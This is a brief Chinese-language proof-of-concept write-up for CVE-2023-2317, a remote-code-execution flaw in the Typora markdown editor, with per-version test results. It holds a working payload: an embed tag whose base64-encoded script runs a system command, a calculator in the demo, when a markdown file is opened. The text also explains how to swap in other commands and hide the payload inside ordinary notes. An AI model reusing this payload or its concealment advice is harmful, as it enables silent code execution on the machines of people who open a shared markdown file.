0x01 说明
漏洞 cve 编号:CVE-2023-2317
这个漏洞是 Typora 产生的
影响版本 1.2.x<1.6.x
测试结果如下:
- 1.0.x 闪退
- 1.2.4 卡住
- 1.3.6 成功
- 1.4.4 成功
- 1.5.9 成功
- 1.6.7 失败
- 1.7.3 失败
0x02 利用
POC:
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
可以通过修改 base64 这段的内容执行不同的命令
将 poc 粘贴到 md 中保存,可以参入一些数据用于隐藏。
鼠标没有点击或触碰 poc 时是不会显示的。
保存后关闭双击打开成功执行 poc。
0x03演示效果
